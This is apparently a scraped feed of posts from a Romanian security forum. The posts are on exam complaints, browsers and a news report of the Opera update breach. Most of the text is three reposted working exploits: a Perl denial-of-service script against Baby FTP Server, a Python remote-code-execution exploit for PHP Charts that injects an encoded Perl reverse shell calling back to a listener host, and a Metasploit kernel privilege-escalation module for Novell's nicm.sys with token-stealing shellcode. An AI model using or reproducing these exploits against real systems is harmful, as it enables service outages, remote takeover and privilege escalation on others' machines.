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Pentru ca unii mai si invata ca sa treaca bacul.Foarte bine au facut cu reclamatia , intr-o tara civilizata asa se face.M-am saturat sa tot ii vad pe aia de la sapa cum vin cu galetile si damigenele de vin la profesori sa treaca clasa.Bacalaureatul trebuie sa il ia doar cine este destept !! //M-am abtinut de la injuraturi , dar cel de deasupra mea m-a inlocuit cu succes.
Celor de la profil uman le-a picat foarte usor simbolismul dupa parerea mea.E cel mai usor lucru de invatat Bacovia ( Plumb ) , sunt putine strofe , o inveti pe de rost imediat , deci ar trebui sa fie bucurosi zic eu. Pentru cei de la Real sa zicem ca a fost un pic mai greu insa nici acolo nu e mare "inventie".La mine in liceu profesoara ne-a batut la cap tot anul cu Arghezi/Bacovia/Barbu , ne-a pus sa le invatam calumea de tot si tocmai ca n-a picat aia, asta fiind acum ceva timp.Deci unul dintre Arghezi/Barbu/Blaga tot ati invatat sau macar studiat intr-un an de zile. Nu aveti de ce sa va plangeti , subiectele sunt abordabile pentru toata lumea.
Daca inca mai activa Nemessis pe forum , probabil s-ar fi sinucis cand citea postul ala.
Opera.com a fost spart si utilizatorii au primit o actualizare infectata
Matt replied to Matt's topic in Stiri securitate
Maxthon n-avea probleme cu Adobe Flash Player? Imi amintesc ca l-am incercat acum ceva timp insa chiar nu imi mai amintesc de ce l-am scos. -
Infiltrating malware servers without doing anything
Matt replied to Nytro's topic in Tutoriale in engleza
Nu se vad pozele.Apare 404 la fiecare. -
Ce e funny? Ei cer test IQ in engleza pe cand gramatica lor..
Opera.com a fost spart si utilizatorii au primit o actualizare infectata
Matt replied to Matt's topic in Stiri securitate
You know better. -
Opera.com a fost spart si utilizatorii au primit o actualizare infectata
Matt replied to Matt's topic in Stiri securitate
Nu stiu exact care era problema .. dar era usor de sesizat.Am facut un test odata : Deschideam Opera , apoi Chrome si vedeam ca Chrome e mult mai rapid.Apoi incercam sa deschid pagina sport.ro care e o pagina cu destul de multe pe homepage Chrome deschidea imediat pe cand la Opera treceau si 5-6 secunde peste Chrome. -
Sunt unele banalitati insa restul mi se pare bune. // In general orice este open-source.
Opera.com a fost spart si utilizatorii au primit o actualizare infectata
Matt replied to Matt's topic in Stiri securitate
Parerea mea.. Chrome este cel mai rapid si cel mai ok, insa e foarte naspa cu controlul asupra datelor personale.Opera l-am incercat de cateva ori nu mi se parea suficient de rapid.Aveam pagini care se incarcau foarte greu.Safari : arata bine dar se misca mai greu ca celelalte.Firefox : l-am folosit la inceput si in viitor il voi folosi din nou. IE - n-are rost sa comentez. -
In data de 19 iunie reteaua informatica a companiei Opera Software a fost sparta. A fost utilizat un certificat semnat digital de catre companie pentru a semna un executabil infectat, ce a fost trimis apoi ca o actualizare “oficiala” a browserului. Timp de 36 de minute, baietii rai au avut acces la infrastructura Opera si au trimis aceasta actualizare falsa infectata catre utilizatori. Nu se stie exact cati din cei 300 de milioane de utilizatori au descarcat-o, insa cert este ca dupa instalare acest malware cauta parolele stocate in browsere si clientii FTP. De asemenea, dupa cateva minute, calculatorul utilizatorului era blocat de un troian din categoria “Ransom” care solicita 300$ pentru deblocarea sistemului. Daca ati fost afectati de aceasta problema, scanati PC-ul de pe un CD bootabil antivirus. Sursa: Fake Opera Browser Update Distributes Ransomware | Malwarebytes Unpacked Alt link : https://rstforums.com/forum/71254-opera-breached-code-cert-stolen.rst
Deja l-ai umplut de reclame.
Din ce imi dau seama .. e ca toata treaba de la cap se impute.Degeaba folosesti programele din afara PRISM daca folosesti Windows , APPLE
Am luat aminte de ce ai scris blech.Ideea este urmatoarea , eu intr-o zi normala citesc foarte mult despre it news , security indiferent de calitatea postului.Iti dau dreptate asupra acestui post , poate si asupra altor posturi , insa decat sa fie forumul spamat cu 100 posturi de off-topic pe zi , prefer sa includ 30 de stiri dintre care 15 sa fie de calitate. Data viitoare foloseste butonul report.
Author : Chako Source : Baby FTP Server 1.24 - Denial Of Service Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/d015ca97b65dd039a31a68b9ee725fc8-babyftp.zip Code : #!/usr/bin/perl # # # ################################################################### # # Exploit Title: Baby FTP Server Version 1.24 Denial Of Service # Date: 2013/6/25 # Exploit Author: Chako # Vendor Homepage: http://www.pablosoftwaresolutions.com/html/baby_ftp_server.html # Software Download Link: http://www.pablosoftwaresolutions.com/files/babyftp.zip # Version: 1.24 # Tested on: Windows 7 # Description: # A bug discovered in Baby FTP Server Version 1.24 allows an attacker # to cause a Denial of Service using a specially crafted request(USER, PASS...etc). # ################################################################### use IO::Socket; $TARGET = ""; $PORT = 21; $JUNK = "\x41" x 2500; $PAYLOAD = "USER ".$JUNK."\r\n"; #$PAYLOAD = "PASS ".$JUNK."\r\n"; $SOCKET = IO::Socket::INET->new(Proto=>'TCP', PeerHost=>$TARGET, PeerPort=>$PORT) or die "Error: $TARGET :$PORT\n"; $SOCKET->send($PAYLOAD); close($SOCKET);
Author : infodox Source : PHP Charts 1.0 (index.php, type param) - Remote Code Execution Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/939b3a582d42c9dd6f1a9286bac3420d-php-chart_v1.0.zip Code : #!/usr/bin/python # Original Advisory came from: # http://packetstormsecurity.com/files/119582/PHP-Charts-1.0-Code-Execution.html # infodox - insecurety.net import requests import random import threading import sys def genpayload(host, port): """ Perl Reverse Shell Generator """ load = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';""" %(host, port) encoded = load.encode('base64') encoded = encoded.strip() encoded = encoded.replace('\n', '') encoded = encoded.encode('base64') encoded = encoded.strip() encoded = encoded.replace('\n', '') # double encoding , yes payload = "system(base64_decode(base64_decode('%s')))" %(encoded) return payload def hack(pwn): requests.get(pwn) def main(): haxurl = "http://" + target + path + "wizard/index.php?type=';INSERTCODE;//" payload = genpayload(host, port) pwn = haxurl.replace("INSERTCODE", payload) print "[+] Preparing for hax" print "[!] Please run nc -lvp %s on your listener" %(port) raw_input("Press Enter to Fire...") # debugging print "[*] Sending malicious request..." threading.Thread(target=hack, args=(pwn,)).start() # ph33r l33t thr34d1ng print "[?] g0tr00t?" sys.exit(0) def randomQuote(): quotes =\ ['Now with advice from Sabu!', 'Now with LOIC Support', 'Now with auto-DDoS', 'Now with auto-brag!', 'Now with advice from Kevin Mitnick', 'Now with silly quotes!', 'Comes with free forkbombs!', 'Now with a free copy of Havij', 'Are you stoned, or just stupid?'] randomQuote = random.choice(quotes) return randomQuote def banner(): print "PHP-Charts v1.0 Remote Code Execution Exploit." randomquote = randomQuote() print randomquote if len(sys.argv) != 5: banner() print "Usage: %s <target host> <path to wizard> <listener host> <listener port>" %(sys.argv[0]) print "Example: %s hackme.com /wp/chart/chart/ hacke.rs 1337" %(sys.argv[0]) sys.exit(1) else: banner() target = sys.argv[1] path = sys.argv[2] host = sys.argv[3] port = sys.argv[4] main()
Author : metasploit Source : Novell Client 2 SP3 nicm.sys Local Privilege Escalation Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Common include Msf::Post::Windows::Priv def initialize(info={}) super(update_info(info, { 'Name' => 'Novell Client 2 SP3 nicm.sys Local Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the nicm.sys driver to execute arbitrary code in kernel space. The vulnerability occurs while handling ioctl requests with code 0x143B6B, where a user provided pointer is used as function pointer. The module has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ # Tested with nicm.sys Version v3.1.5 Novell XTier Novell XTCOM Services Driver for Windows # as installed with Novell Client 2 SP3 for Windows 7 [ 'Automatic', { } ], [ 'Windows 7 SP1', { 'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates '_KPROCESS' => "\x50", # Offset to _KPROCESS from a _ETHREAD struct '_TOKEN' => "\xf8", # Offset to TOKEN from the _EPROCESS struct '_UPID' => "\xb4", # Offset to UniqueProcessId FROM the _EPROCESS struct '_APLINKS' => "\xb8" # Offset to ActiveProcessLinks _EPROCESS struct } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ [ 'OSVDB', '93718' ], [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7012497' ], [ 'URL', 'http://pastebin.com/GB4iiEwR' ] ], 'DisclosureDate' => 'May 22 2013', 'DefaultTarget' => 0 })) end def add_railgun_functions session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ]) session.railgun.add_function( 'ntdll', 'NtDeviceIoControlFile', 'DWORD', [ [ "DWORD", "FileHandle", "in" ], [ "DWORD", "Event", "in" ], [ "DWORD", "ApcRoutine", "in" ], [ "DWORD", "ApcContext", "in" ], [ "PDWORD", "IoStatusBlock", "out" ], [ "DWORD", "IoControlCode", "in" ], [ "LPVOID", "InputBuffer", "in" ], [ "DWORD", "InputBufferLength", "in" ], [ "LPVOID", "OutputBuffer", "in" ], [ "DWORD", "OutPutBufferLength", "in" ] ]) session.railgun.add_function( 'ntdll', 'NtQueryIntervalProfile', 'DWORD', [ [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] ]) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"] ]) session.railgun.add_function( 'psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"] ]) end def open_device(dev) invalid_handle_value = 0xFFFFFFFF r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ", 0x3, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_READONLY", 0) handle = r['return'] if handle == invalid_handle_value return nil end return handle end def execute_shellcode(shell_addr) vprint_status("Creating the thread to execute the shellcode...") ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, "CREATE_SUSPENDED", nil) if ret['return'] < 1 vprint_error("Unable to CreateThread") return nil end hthread = ret['return'] vprint_status("Resuming the Thread...") ret = client.railgun.kernel32.ResumeThread(hthread) if ret['return'] < 1 vprint_error("Unable to ResumeThread") return nil end return true end def ring0_shellcode(t) tokenstealing = "\x52" # push edx # Save edx on the stack tokenstealing << "\x53" # push ebx # Save ebx on the stack tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+50h] # Retrieve _KPROCESS tokenstealing << "\x8b\xc8" # mov ecx, eax tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0f8h] # Retrieves TOKEN tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+b8h] <====| # Retrieve FLINK from ActiveProcessLinks tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,b8h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+b4h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) tokenstealing << "\x75\xe8" # jne 0000101e ====================== tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0f8h] # Retrieves TOKEN and stores on EDX tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0f8h],edx # Overwrites the TOKEN for the current KPROCESS tokenstealing << "\x5b" # pop ebx # Restores ebx tokenstealing << "\x5a" # pop edx # Restores edx tokenstealing << "\xc2\x08" # ret 08h # Away from the kernel! return tokenstealing end def allocate_memory(proc, address, length) result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("V"), nil, [ length ].pack("V"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") if not result["BaseAddress"] or result["BaseAddress"].empty? vprint_error("Failed to allocate memory") return nil end my_address = result["BaseAddress"].unpack("V")[0] vprint_good("Memory allocated at 0x#{my_address.to_s(16)}") if not proc.memory.writable?(my_address) vprint_error("Failed to allocate memory") return nil else vprint_good("0x#{my_address.to_s(16)} is now writable") end return my_address end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def check handle = open_device("\\\\.\\nicm") if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) return Exploit::CheckCode::Detected end def exploit vprint_status("Adding the railgun stuff...") add_railgun_functions if sysinfo["Architecture"] =~ /wow64/i fail_with(Exploit::Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Exploit::Failure::NoTarget, "Running against 64-bit systems is not supported") end my_target = nil if target.name =~ /Automatic/ print_status("Detecting the target system...") os = sysinfo["OS"] if os =~ /windows 7/i my_target = targets[1] print_status("Running against #{my_target.name}") end else my_target = target end if my_target.nil? fail_with(Exploit::Failure::NoTarget, "Remote system not detected as target, select the target manually") end print_status("Checking device...") handle = open_device("\\\\.\\nicm") if handle.nil? fail_with(Exploit::Failure::NoTarget, "\\\\.\\nicm device not found") else print_good("\\\\.\\nicm found!") end this_proc = session.sys.process.open print_status("Storing the Kernel stager on memory...") stager_address = 0x0d0d0000 stager_address = allocate_memory(this_proc, stager_address, 0x1000) if stager_address.nil? or stager_address == 0 session.railgun.kernel32.CloseHandle(handle) fail_with(Exploit::Failure::Unknown, "Failed to allocate memory") end # eax => &kernel_stager # .text:000121A3 mov ecx, eax # .text:000121A5 mov eax, [ecx] # .text:000121A7 mov edx, [eax] # .text:000121A9 push ecx # .text:000121AA push eax # .text:000121AB call dword ptr [edx+0Ch] kernel_stager = [ stager_address + 0x14, # stager_address junk, junk, junk, junk, stager_address + 0x18, # stager_address + 0x14 junk, junk, junk, stager_address + 0x28 # stager_address + 0x24 ].pack("V*") kernel_stager << ring0_shellcode(my_target) result = this_proc.memory.write(stager_address, kernel_stager) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Exploit::Failure::Unknown, "Failed to write contents to memory") else vprint_good("Contents successfully written to 0x#{stager_address.to_s(16)}") end print_status("Triggering the vulnerability to execute the Kernel Handler") magic_ioctl = 0x143B6B # Vulnerable IOCTL ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, stager_address, 0x14, 0, 0) session.railgun.kernel32.CloseHandle(handle) if ioctl["GetLastError"] != 0 print_error("Something wrong while triggering the vulnerability, anyway checking privileges...") end print_status("Checking privileges after exploitation...") if not is_system? fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful") else print_good("Exploitation successful!") end print_status("Storing the final payload on memory...") shell_address = 0x0c0c0000 shell_address = allocate_memory(this_proc, shell_address, 0x1000) if shell_address.nil? fail_with(Exploit::Failure::Unknown, "Failed to allocate memory") end result = this_proc.memory.write(shell_address, payload.encoded) if result.nil? fail_with(Exploit::Failure::Unknown, "Failed to write contents to memory") else print_good("Contents successfully written to 0x#{shell_address.to_s(16)}") end print_status("Executing the payload...") result = execute_shellcode(shell_address) if result.nil? fail_with(Exploit::Failure::Unknown, "Error while executing the payload") else print_good("Enjoy!") end end end